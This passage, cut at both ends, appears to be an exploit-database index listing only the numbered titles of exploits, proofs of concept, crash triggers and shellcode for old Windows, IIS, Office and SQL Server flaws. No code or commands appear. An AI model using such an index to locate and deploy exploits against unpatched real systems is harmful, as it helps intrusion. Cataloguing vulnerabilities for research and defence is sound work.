5.0,MIT Kerberos 4/5,RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (3) [19925] Cygnus Network Security 4.0/KerbNet 5.0,MIT Kerberos 4/5,RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (2) [19924] Cygnus Network Security 4.0/KerbNet 5.0,MIT Kerberos 4/5,RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (1) [19908] Microsoft IIS 4.0/5.0 Malformed Filename Request Vulnerability [19907] Microsoft IIS 4.0/5.0 Malformed File Extension DoS Vulnerability [19830] Microsoft Index Server 2.0 '%20' ASP Source Disclosure Vulnerability [19827] NT 4.0 / Windows 2000 TCP/IP Printing Service DoS Vulnerability [19815] vqsoft vqserver for windows 1.9.9 - Directory Traversal vulnerability [19799] Windows 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 MS DoS Device Name DoS [19789] Microsoft Clip Art Gallery 5.0 - Buffer Overflow Vulnerability [19743] Cat Soft Serv-U 2.5/a/b,Windows 2000/95/98/NT 4.0 Shortcut Vulnerability [19742] microsoft iis 3.0/4.0,microsoft index server 2.0 - Directory Traversal [19734] Microsoft Virtual Machine 2000 Series/3000 Series getSystemResource Vulnerability [19733] McAfee 4.0,Network Associates for Windows NT 4.0.2/4.0.3 a,Norton AntiVirus 2000 Recycle Bin Exclusion [19728] Microsoft Systems Management Server 2.0 Default Permissions Vulnerability [19638] Microsoft SQL Server 7.0/7.0 SP1 NULL Data DoS Vulnerability [19637] MS IE 5.0 for Windows 2000/95/98/NT 4 XML HTTP Redirect Vulnerability [19633] Windows 95/98/Enterprise Server 4/NT Server 4/Terminal Server 4/Workstation 4 Riched Buffer Overflow [19608] Windows 95/98 UNC Buffer Overflow Vulnerability (2) [19607] Windows 95/98 UNC Buffer Overflow Vulnerability (1) [19594] MS Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Spoolss.exe DLL Insertion Vulnerability [19516] Microsoft MSN Messenger Service 1.0 Setup BBS ActiveX Control Buffer Overflow [19515] MS IE 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer Overflow [19473] Microsoft Internet Explorer 5.0 FTP Password Storage Vulnerability [19471] Microsoft Internet Explorer 5.0 HTML Form Control DoS [19445] Microsoft FrontPage Personal WebServer 1.0 PWS DoS Vulnerability [19435] Microsoft JET 3.5/3.51/4.0 VBA Shell Vulnerability [19425] Microsoft Data Access Components (MDAC) <= 2.1,Microsoft IIS 3.0/4.0,Microsoft Index Server 2.0,Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (2) [19424] Microsoft Data Access Components (MDAC) <= 2.1,Microsoft IIS 3.0/4.0,Microsoft Index Server 2.0,Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (1) [19415] Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (3) [19414] Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (2) [19413] Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (1) [19376] Microsoft IIS 2.0/3.0/4.0 ISAPI GetExtensionVersion() Vulnerability [19361] Microsoft IIS 3.0/4.0 Double Byte Code Page Vulnerability [19248] Microsoft IIS 4.0 - Buffer Overflow Vulnerability (4) [19247] Microsoft IIS 4.0 - Buffer Overflow Vulnerability (3) [19246] Microsoft IIS 4.0 - Buffer Overflow Vulnerability (2) [19245] Microsoft IIS 4.0 - Buffer Overflow Vulnerability (1) [19228] Microsoft IIS 4.0,Microsoft JET 3.5/3.5.1 Database Engine VBA Vulnerability [19208] Microsoft Site Server Commerce Edition 3.0 alpha AdSamples Vulnerability [19207] Microsoft Outlook Express 4.27.3110/4.72.3120 POP Denial of Service Vulnerability [19194] Microsoft IIS 3.0/4.0 Using ASP And FSO To Read Server Files Vulnerability [19186] Microsoft XML Core Services MSXML Uninitialized Memory Corruption [19164] Microsoft IE4 Clipboard Paste Vulnerability [19156] Microsoft Internet Explorer 5.0.1 Invalid Byte Cross-Frame Access Vulnerability [19152] Microsoft IIS 5.0 IISAPI Extension Enumerate Root Web Server Directory Vulnerability [19144] Microsoft Zero Administration Kit (ZAK) 1.0 and Office97 Backdoor Vulnerability [19129] Microsoft IIS 4.0,Microsoft Site Server 3.0 Showcode ASP Vulnerability [19118] Microsoft IIS 3.0/4.0,Microsoft Personal Web Server 2.0/3.0/4.0 ASP Alternate Data Streams Vulnerability [19089] Windows OpenType Font - File Format DoS Exploit [19083] Cheyenne Inoculan for Windows NT 4.0 Share Vulnerability [19037] MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability [19033] microsoft iis 6.0 and 7.5 - Multiple Vulnerabilities [19026] Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow [18952] Microsoft Wordpad 5.1 (.doc) Null Pointer Dereference Vulnerability [18894] Windows XP Keyboard Layouts Pool Corruption LPE 0day PoC (post-MS12-034) [18759] TFTP Server for Windows 1.4 ST WRQ Buffer Overflow [18606] Microsoft Terminal Services Use After Free (MS12-020) [18365] Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability [18334] Microsoft Office 2003 Home/Pro 0day [18272] Windows Explorer Denial of Service (DOS) [18271] Windows Media Player 11.0.5721.5262 - Remote Denial of Service (DOS) [18143] MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow [18087] MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow [18078] Microsoft Excel 2003 11.8335.8333 Use After Free [18067] Microsoft Excel 2007 SP2 Buffer Overwrite Exploit [17830] Microsoft WINS Service <= 5.2.3790.4520 Memory Corruption [17796] Windows Server 2008 R1 Local Denial of Service [17783] ZipX for Windows 1.71 ZIP File - Buffer Overflow Exploit [17659] MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow [17476] Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS [MS09-053] [17451] Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability [17399] Microsoft Office XP Remote code Execution [17398] Windows Media Player with K-Lite Codec Pack DoS PoC [17227] Microsoft Office Excel Axis Properties Record Parsing Buffer Overflow PoC [17164] Microsoft Reader <= 2.1.1.3143 NULL Byte Write [17163] Microsoft Reader <= 2.1.1.3143 Array Overflow [17162] Microsoft Reader <= 2.1.1.3143 Integer Overflow [17161] Microsoft Reader <= 2.1.1.3143 Heap Overflow [17160] Microsoft Reader <= 2.1.1.3143 Integer Overflow [17159] Microsoft Host Integration Server <= 8.5.4224.0 DoS Vulnerabilities [17158] Microsoft HTML Help <= 6.1 Stack Overflow [17072] Windows Explorer 6.0.2900.5512 (Shmedia.dll 6.0.2900.5512) AVI Preview DoS PoC [16991] Microsoft Source Code Analyzer for SQL Injection 1.3 Improper Permissions [16750] Microsoft Message Queueing Service DNS Name Path Overflow [16749] Microsoft RPC DCOM Interface Overflow [16748] Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP) [16747] Microsoft Message Queueing Service Path Overflow [16740] Microsoft IIS FTP Server NLST Response Overflow [16698] Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) [16686] Microsoft Word RTF pFragments Stack Buffer Overflow (File Format) [16680] Microsoft Visual Basic VBP Buffer Overflow [16665] Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow [16649] Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit [16625] Microsoft Excel Malformed FEATHEADER Record Vulnerability [16615] Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption [16612] Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution [16608] Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow [16605] Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download [16545] Microsoft Help Center XSS and Command Execution [16542] Microsoft OWC Spreadsheet HTMLURL Buffer Overflow [16537] Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption [16526] Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) [16521] Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow [16516] Microsoft WMI Administration Tools ActiveX Buffer Overflow [16507] Microsoft Visual Studio Msmask32.ocx ActiveX Buffer Overflow [16472] Microsoft IIS 5.0 IDQ Path Overflow [16471] Microsoft IIS WebDAV Write Access Code Execution [16470] Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow [16469] Microsoft IIS 5.0 Printer Host Header Overflow [16468] Microsoft IIS 4.0 .HTR Path Overflow [16467] Microsoft IIS/PWS CGI Filename Double Decode Command Execution [16442] Microsoft DirectX DirectShow SAMI Buffer Overflow [16427] Windows RSH daemon Buffer Overflow [16403] CA BrightStor Agent for Microsoft SQL Overflow [16398] Microsoft SQL Server Hello Overflow [16396] Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection [16395] Microsoft SQL Server Payload Execution [16394] Microsoft SQL Server Payload Execution via SQL injection [16393] Microsoft SQL Server Resolution Overflow [16392] Microsoft SQL Server sp_replwritetovarbin Memory Corruption [16379] Microsoft Outlook Express NNTP Response Parsing Buffer Overflow [16378] Microsoft Workstation Service NetAddAlternateComputerName Overflow [16377] Microsoft ASN.1 Library Bitstring Heap Overflow [16375] Microsoft RRAS Service RASMAN Registry Overflow [16373] Microsoft Services MS06-066 nwapi32.dll [16372] Microsoft Workstation Service NetpManageIPCConnect Overflow [16371] Microsoft NetDDE Service Overflow [16369] Microsoft Services MS06-066 nwwks.dll [16368] Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow [16367] Microsoft Server Service NetpwPathCanonicalize Overflow [16366] Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB) [16365] Microsoft Plug and Play Service Overflow [16364] Microsoft RRAS Service Overflow [16362] Microsoft Server Service Relative Path Stack Corruption [16361] Microsoft Print Spooler Service Impersonation Vulnerability [16359] Microsoft WINS Service Memory Overwrite [16358] Microsoft IIS ISAPI RSA WebAgent Redirect Overflow [16357] Microsoft IIS Phone Book Service Overflow [16356] Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow [16355] Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow [16354] Microsoft IIS ISAPI w3who.dll Query String Overflow [16334] Microsoft Private Communications Transport Overflow [16333] Windows Media Services ConnectFunnel Stack Buffer Overflow [16332] Veritas Backup Exec Windows Remote Agent Overflow [16262] MS Windows XP - WmiTraceMessageVa Integer Truncation Vulnerability PoC (MS11-011) [16166] MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow [16071] Microsoft Internet Explorer MHTML Protocol Handler XSS [16024] Microsoft Fax Cover Page Editor <= 5.2.3790.3959 Double Free Memory Corruption [15984] MS11-002: Microsoft Data Access Components Vulnerability [15963] MS10-081: Windows Common Control Library (Comctl32) Heap Overflow [15894] MS10-073 Windows Class Handling Vulnerability [15803] Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC [15758] Windows Win32k Pointer Dereferencement PoC (MS10-098) [15609] Elevation of privileges under Windows Vista/7 (UAC Bypass) 0day [15589] Windows Task Scheduler Privilege Escalation 0day [15319] Apache 2.2 (Windows) Local Denial of Service [15297] Windows Mobile 6.1 and 6.5 Double Free Denial of Service [15266] Windows NTLM Weak Nonce Vulnerability [15262] Microsoft Office HtmlDlgHelper Class Memory Corruption [15167] Microsoft IIS 6.0 ASP Stack Overflow (Stack Exhaustion) Denial of Service (MS10-065) [15158] MOAUB #30 - Microsoft Unicode Scripts Processor Remote Code Execution [15148] MOAUB #29 - Microsoft Excel SxView Record Parsing Heap Memory Corruption [15136] Windows Mobile 6.5 TR Phone Call Shellcode [15122] MOAUB #27 - Microsoft Internet Explorer MSHTML Findtext Processing Issue [15116] Windows Mobile 6.5 TR (WinCE 5.2) MessageBox Shellcode (ARM) [15112] MOAUB #26 - Microsoft Cinepak Codec CVDecompress Heap Overflow [15096] MOAUB #24 - Microsoft MPEG Layer-3 Audio Decoder Division By Zero [15094] MOAUB #24 - Microsoft Excel OBJ Record Stack Overflow [15088] MOAUB #23 - Microsoft Excel HFPicture Record Parsing Memory Corruption (0day) [15065] MOAUB #21 - Microsoft Excel WOPT Record Parsing Heap Memory Corruption [15061] microsoft drm technology (msnetobj.dll) activex Multiple Vulnerabilities [15034] Microsoft Mspaint bmp crash Proof Of Concept [15019] MOAUB #16 - Microsoft Excel HFPicture Record Parsing Remote Code Execution Vulnerability [14971] MOAUB #11 - Microsoft Office Word 2007 sprmCMajority Buffer Overflow [14944] MOAUB #8 - Microsoft Office Visio DXF File Stack based Overflow [14895] MOAUB #5 - Microsoft MPEG Layer-3 Remote Command Execution Exploit [14782] Microsoft Office PowerPoint 2007 DLL Hijacking Exploit (rpawinet.dll) [14780] Windows Internet Communication Settings DLL Hijacking Exploit (schannel.dll) [14758] Microsoft Group Convertor DLL Hijacking Exploit (imm.dll) [14754] Microsoft Internet Connection Signup Wizard DLL Hijacking Exploit (smmscrpt.dll) [14751] Microsoft Vista BitLocker Drive Encryption API Hijacking Exploit (fveapi.dll) [14746] Microsoft Office Groove 2007 DLL Hijacking Exploit (mso.dll) [14745] Microsoft Address Book 6.00.2900.5512 DLL Hijacking Exploit (wab32res.dll) [14744] Microsoft Visio 2003 DLL Hijacking Exploit (mfc71enu.dll) [14728] Windows Live Email DLL Hijacking Exploit (dwmapi.dll) [14723] Microsoft Power Point 2010 DLL Hijacking Exploit (pptimpconv.dll) [14697] Windows XP SP3 English MessageBoxA Shellcode - 87 bytes [14613] Windows Live Messenger <= 14.0.8117 Animation Remote Denial of Service [14607] Microsoft SMB Server Trans2 Zero Size Pool Alloc (MS10-054) [14413] IE 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control [14361] Microsoft Excel 0x5D record Stack Overflow Vulnerability [14295] Microsoft MSHTML.DLL CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak (0day) [14179] Microsoft Internet Information Services (IIS) 5 Authentication Bypass Vulnerability (MS10-065) [14156] Windows Vista/Server 2008 NtUserCheckAccessForIntegrityLevel Use-after-free Vulnerability [13729] Windows Seven x64 (cmd) Shellcode 61 Bytes [13719] Windows Seven Pro SP1 64 Fr (Beep) Shellcode 39 Bytes [13639] Windows XP Professional SP2 ita calc.exe shellcode 36 bytes [13631] Windows XP Home Edition SP3 English (calc.exe) 37 bytes [13630] Windows Xp Home Edition SP2 English (calc.exe) 37 bytes [13582] "Windows XP Pro Sp2 English ""Wordpad"" Shellcode" [13581] "Windows XP Pro Sp2 English ""Message-Box"" Shellcode" [13532] MS Windows (DCOM RPC2) Universal Shellcode [13531] windows/XP-sp1 portshell on port 58821 116 bytes [13530] windows/XP download and exec source [13527] Windows 9x/NT/2k/XP PEB method 35 bytes [13526] Windows 9x/NT/2k/XP PEB method 31 bytes [13525] Windows 9x/NT/2k/XP PEB method 29 bytes [13524] Windows 9x/NT/2k/XP Reverse Generic Shellcode without Loader 249 bytes [13523] Windows NT/2k/XP useradd shellcode for russian systems 318 bytes [13504] Windows x86 null-free bindshell for Windows 5.0-7.0 all service packs [13283] windows xp/sp1 generate portbind payload [12728] Microsoft Outlook Web Access (OWA) 8.2.254.0 - Information Disclosure vulnerability [12524] Windows SMB2 Negotiate Protocol (0x72) Response DoS [12518] Microsoft Paint Integer Overflow Vulnerability (DoS) MS10-005 [12450] Microsoft SharePoint Server 2007 XSS Vulnerability [12337] Windows 2000/XP/2003 win32k.sys SfnINSTRING local kernel Denial of Service Vulnerability [12336] Windows 2000/XP/2003 win32k.sys SfnLOGONNOTIFY local kernel Denial of Service Vulnerability [12273] Windows 7/2008R2 SMB Client Trans2 Stack Overflow 10-020 PoC [12119] WINDOWS FTP SERVER by DWG (Auth Bypass) [12079] Microsoft Office (2010 beta) Communicator SIP Denial of Service Exploit [12032] Microsoft Internet Explorer Tabular Data Control ActiveX Remote Code Execution [11683] Microsoft Internet Explorer iepeers.dll Use-After-Free Exploit (meta) [11531] Windows Media Player 11.0.5721.5145 (.mpg) Buffer Overflow Exploit [11276] Microsoft Internet Explorer 6.0/7.0 NULL pointer crashes [11214] Windows Live Messenger 2009 ActiveX Heap Overflow PoC [11199] Windows NT User Mode to Ring 0 Escalation Vulnerability [11070] Windows Live Messenger 2009 ActiveX DoS Vulnerability [11034] Microsoft HTML Help Compiler (hhc.exe) BOF PoC [10791] Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x [10747] Mini-Stream Exploit for Windows XP SP2 and SP3 [10375] SAP GUI for Windows sapirrfc.dll Activex Overflow Exploit [10005] Windows 7 / Server 2008R2 Remote Kernel Crash [10001] CUPS 'kerberos' Parameter Cross Site Scripting Vulnerability [9893] Microsoft Internet Explorer 5,6,7 - Memory Corruption PoC [9596] SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH) [9594] Windows Vista/7 SMB2.0 Negotiate Protocol Request Remote BSOD Vuln [9592] SIDVault 2.0e Windows Remote Buffer Overflow Exploit (meta) [9587] Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service [9586] SIDVault 2.0e Windows Remote Buffer Overflow Exploit [9559] Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4) [9541] Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k) [9516] Novell Client for Windows 2000/XP ActiveX Remote DoS Vulnerability [9417] MS Windows 2003 (EOT File) BSOD Crash Exploit [9163] Microsoft Office Web Components (Spreadsheet) ActiveX BOF PoC [9117] HTC / Windows Mobile OBEX FTP Service Directory Traversal Vuln [9100] Microsoft Internet Explorer (AddFavorite) Remote Crash PoC [9093] windows live messenger plus! fileserver 1.0 - Directory Traversal vuln [8832] ICQ 6.5 URL Search Hook (Windows Explorer) Remote BOF PoC [8806] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (pl) [8765] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php) [8754] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch) [8704] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Vulnerability [8467] Microsoft Media Player - (quartz.dll .wav) Multiple Remote DoS Vulns [8466] Microsoft GDI Plugin .png Infinite Loop Denial of Service PoC [8465] Microsoft Media Player - (quartz.dll .mid) Denial of Service Exploit [8445] MS Windows Media Player (.mid File) Integer Overflow PoC [8281] Microsoft GdiPlus EMF GpFont.SetData Integer Overflow PoC [7910] WOW - Web On Windows ActiveX Control 2 Remote Code Execution [7727] Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit [7720] MS Windows (.CHM File) Denial of Service (html compiled) [7585] MS Windows Media Player - (.WAV) Remote Crash PoC [7501] Microsoft SQL Server sp_replwritetovarbin() Heap Overflow Exploit [7262] Microsoft Office Communicator (SIP) Remote Denial of Service Exploit [7217] Quicksilver Forums <= 1.4.2 RCE Exploit (windows only) [7196] Microsoft XML Core Services DTD Cross-Domain Scripting PoC MS08-069 [7132] MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3) [7104] MS Windows Server Service Code Execution Exploit (MS08-067) [6841] MS Windows Server Service Code Execution Exploit (MS08-067) (Univ) [6824] MS Windows Server Service Code Execution PoC (MS08-067) [6757] MS Windows XP/2003 AFD.sys Privilege Escalation Exploit (K-plugin) [6732] MS Windows InternalOpenColorProfile Heap Overflow PoC (MS08-046) [6716] MS Windows GDI+ Proof of Concept (MS08-052) #2 [6705] MS Windows 2003 Token Kidnapping Local Exploit PoC [6699] Microsoft PicturePusher ActiveX Cross Site File Upload Attack PoC [6671] MS Windows Vista Access Violation from Limited Account Exploit (BSoD) [6656] MS Windows GDI (EMR_COLORMATCHTOTARGETW) Exploit MS08-021 [6616] MS Windows Explorer Unspecified .ZIP File Denial of Service Exploit [6588] MS Windows GDI+ (.ico File) Remote Division By Zero Exploit [6582] Windows Mobile 6.0 Device long name Remote Reboot Exploit [6565] K-Lite Mega Codec Pack 3.5.7.0 - Local Windows Explorer DoS PoC [6560] MS Windows Wordpad .doc File Local Denial of Service PoC [6463] MS Windows WRITE_ANDX SMB command handling Kernel DoS (meta) [6454] Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053) [6330] Micrsoft Windows GDI (CreateDIBPatternBrushPt) Heap Overflow PoC [6317] Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit [6244] Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC [6181] RealVNC Windows Client 4.1.2 - Remote DoS Crash PoC [6124] Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit [5951] XnView 1.93.6 for Windows .taac Local Buffer Overflow Exploit PoC [5563] TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit [5530] Microsoft Works 7 WkImgSrv.dll ActiveX Remote BOF Exploit [5518] MS Windows XP SP2 (win32k.sys) Privilege Escalation Exploit (MS08-025) [5460] Microsoft Works 7 WkImgSrv.dll ActiveX Denial of Service PoC [5442] MS Windows GDI Image Parsing Stack Overflow Exploit (MS08-021) [5349] Microsoft Visual InterDev 6.0 (SP6) SLN File Local Buffer Overflow PoC [5327] MS Windows Explorer Unspecified .DOC File Denial of Service Exploit [5320] Microsoft Office XP SP3 PPT File Buffer Overflow Exploit (ms08-016) [5314] TFTP Server for Windows 1.4 ST Buffer Overflow Exploit (0day) [5287] Microsoft Office Excel Code Execution Exploit (MS08-014) [5107] Microsoft Office .WPS File Stack Overflow Exploit (MS08-011) [5087] Microsoft DirectSpeechSynthesis Module Remote Buffer Overflow Exploit [4948] Windows RSH daemon <= 1.8 - Remote Buffer Overflow Exploit [4934] MS Windows Message Queuing Service RPC BOF Exploit (dnsname) [4892] Microsoft Visual InterDev 6.0 (SP6) .sln File Local Buffer Overflow Exploit [4874] Microsoft Rich Textbox Control 6.0 (SP6) SaveFile() Insecure Method [4873] Microsoft FoxServer (vfp6r.dll 6.0.8862.0) ActiveX Command Execution [4866] Microsoft DirectX SAMI File Parsing Remote Stack Overflow Exploit [4760] MS Windows 2000 AS SP4 Message Queue Exploit (MS07-065) [4745] MS Windows Message Queuing Service RPC BOF Exploit (MS07-065) [4702] Windows Media Player 6.4 MP4 File Stack Overflow PoC [4682] Windows Media Player AIFF Divide By Zero Exception DoS PoC [4625] Microsoft Jet Engine MDB File Parsing Stack Overflow PoC [4616] Microsoft Internet Explorer TIF/TIFF Code Execution (MS07-055) [4506] Microsoft Visual FoxPro 6.0 FPOLE.OCX Arbitrary Command Execution [4431] Microsoft Visual Basic Enterprise Edition 6.0 SP6 Code Execution Exploit [4398] Microsoft SQL Server Distributed Management Objects BoF Exploit [4394] Microsoft Visual Studio 6.0 (VBTOVSI.DLL 1.0.0.0) File Overwrite Exploit [4393] Microsoft Visual Studio 6.0 (PDWizard.ocx) Remote Command Execution [4379] Microsoft SQL Server Distributed Management Objects (sqldmo.dll) BoF [4369] Microsoft Visual FoxPro 6.0 (FPOLE.OCX 6.0.8450.0) - Remote PoC [4361] Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec Exploit [4337] MS Windows (GDI32.DLL) Denial of Service Exploit (MS07-046) [4325] XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit [4279] Microsoft DXMedia SDK 6 (SourceUrl) ActiveX Remote Code Execution [4259] Microsoft Visual 6 (VDT70.DLL NotSafe) Stack Overflow Exploit [4222] Windows RSH daemon 1.7 - Remote Buffer Overflow Exploit [4215] MS Windows Explorer.exe Gif Image Denial of Service Exploit [4205] TeamSpeak 2.0 (Windows Release) Remote Denial of Service Exploit [4121] Microsoft Excel 2000/2003 Sheet Name Vulnerability PoC [4067] Microsoft Office MSODataSourceControl COM-object BoF PoC (0day) [4066] Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2) [4065] Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4) [4061] Safari 3 for Windows Beta Remote Command Execution PoC [4044] MS Windows GDI+ ICO File - Remote Denial of Service Exploit [4016] Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit [3977] Microsoft Visual Basic 6.0 Project (Description) Stack overflow PoC [3976] Microsoft Visual Basic 6.0 Project (Company Name) Stack overflow PoC [3973] Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote DoS Exploit [3965] Microsoft IIS 6.0 (/AUX/.aspx) Remote Denial of Service Exploit [3926] MS Windows Vista - Forged ARP packet Network Stack DoS Exploit [3804] MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017) [3755] MS Windows GDI Local Privilege Escalation Exploit (MS07-017) 2 [3740] MS Windows DNS DnssrvQuery Remote Stack Overflow Exploit [3738] XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit [3737] MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4) [3698] Kerberos 1.5.1 Kadmind Remote Root Buffer Overflow Vulnerability [3695] MS Windows Animated Cursor (.ANI) Local Overflow Exploit [3693] MS Windows .HLP File Local HEAP Overflow PoC 0day [3690] microsoft office word 2007 - Multiple Vulnerabilities [3688] MS Windows GDI Local Privilege Escalation Exploit (MS07-017) [3684] MS Windows Explorer Unspecified .ANI File Denial of Service Exploit [3652] MS Windows Animated Cursor (.ANI) Overflow Exploit (Hardware DEP) [3651] MS Windows Animated Cursor (.ANI) Universal Exploit Generator [3647] MS Windows Animated Cursor (.ANI) Local Buffer Overflow Exploit [3636] MS Windows Animated Cursor (.ANI) Remote Exploit (eeye patch bypass) [3635] MS Windows XP Animated Cursor (.ANI) Remote Overflow Exploit 2 [3634] MS Windows XP/Vista Animated Cursor (.ANI) Remote Overflow Exploit [3617] MS Windows Animated Cursor (.ANI) Stack Overflow Exploit [3575] Frontbase <= 4.2.7 - Remote Buffer Overflow Exploit (windows) [3544] Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit [3453] MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption [3419] MS Windows (.doc File) Malformed Pointers Denial of Service Exploit [3260] Microsoft Word 2000 Unspecified Code Execution Exploit (0day) [3193] Microsoft Excel Malformed Palette Record DoS PoC (MS07-002) [3190] MS Windows Explorer (AVI) Unspecified Denial of Service Exploit [3176] Microsoft Visual C++ (.RC Resource Files) Local Buffer Overflow Exploit [3159] Microsoft Help Workshop 4.03.0002 (.HPJ) Buffer Overflow Exploit [3149] Microsoft Help Workshop 4.03.0002 (.CNT) Buffer Overflow Exploit [3111] MS Windows Explorer (WMF) CreateBrushIndirect DoS Exploit [3071] Microsoft Vista (NtRaiseHardError) Privilege Escalation Exploit [3052] MS Windows NtRaiseHardError Csrss.exe-winsrv.dll Double Free [3024] MS Windows NtRaiseHardError Csrss.exe Memory Disclosure Exploit [3022] MS Windows ASN.1 - Remote Exploit (MS04-007) [3013] MS Windows NetrWkstaUserEnum() Remote DoS Exploit (0day) [2967] MS Windows (MessageBox) Memory Corruption Local Denial of Service [2935] Windows Media Player 9/10 (MID File) Denial of Service Exploit [2922] Microsoft Word Document (malformed pointer) Proof of Concept [2900] MS Windows DNS Resolution Remote Denial of Service PoC (MS06-041) [2879] MS Windows spoolss GetPrinterData() Remote DoS Exploit (0day) [2809] MS Windows NetpManageIPCConnect Stack Overflow Exploit (py) [2800] MS Windows Wkssvc NetrJoinDomain2 Stack Overflow Exploit (MS06-070) [2789] MS Windows NetpManageIPCConnect Stack Overflow Exploit (MS06-070) [2682] MS Windows NAT Helper Components Remote DoS Exploit (perl) [2672] MS Windows NAT Helper Components (ipnathlp.dll) Remote DoS Exploit [2523] Microsoft Office 2003 PPT Local Buffer Overflow PoC [2412] MS Windows (Windows Kernel) Privilege Escalation Exploit (MS06-049) [2355] MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2k3) [2265] MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2) [2231] Simple Machines Forum <= 1.1 rc2 (lngfile) Remote Exploit (windows) [2223] MS Windows CanonicalizePathName() Remote Exploit (MS06-040) [2210] MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c) (2) [2204] MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c) [2194] MS Windows PNG File IHDR Block Denial of Service Exploit PoC [2162] MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) [2091] Microsoft PowerPoint 2003 SP2 Local Code Execution Exploit (french) [2057] MS Windows Mailslot Ring0 Memory Corruption Exploit (MS06-035) [2056] Microsoft IIS ASP Stack Overflow Exploit (MS06-034) [2054] MS Windows DHCP Client Broadcast Attack Exploit (MS06-036) [2001] Microsoft Word 2000/2003 Unchecked Boundary Condition Vulnerability [1999] Microsoft Word 2000/2003 Hlink Local Buffer Overflow Exploit PoC [1988] Microsoft Excel 2003 Hlink Local Buffer Overflow Exploit (italian) [1986] Microsoft Excel 2000/2003 Hlink Local Buffer Overflow Exploit (french) [1978] Microsoft Excel Universal Hlink Local Buffer Overflow Exploit [1967] MS Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit [1965] MS Windows RRAS RASMAN Registry Stack Overflow Exploit (MS06-025) [1958] Microsoft Excel 2003 Hlink Stack/SEH Buffer Overflow Exploit [1944] Microsoft Excel Unspecified Remote Code Execution Exploit [1940] MS Windows RRAS Remote Stack Overflow Exploit (MS06-025) [1927] Microsoft Excel Unicode Local Overflow Exploit PoC [1911] MS Windows XP/2K (Mrxsmb.sys) Privilege Escalation PoC (MS06-030) [1910] MS Windows (NtClose DeadLock) Vulnerability PoC (MS06-030) [1603] MS Windows XP/2003 - 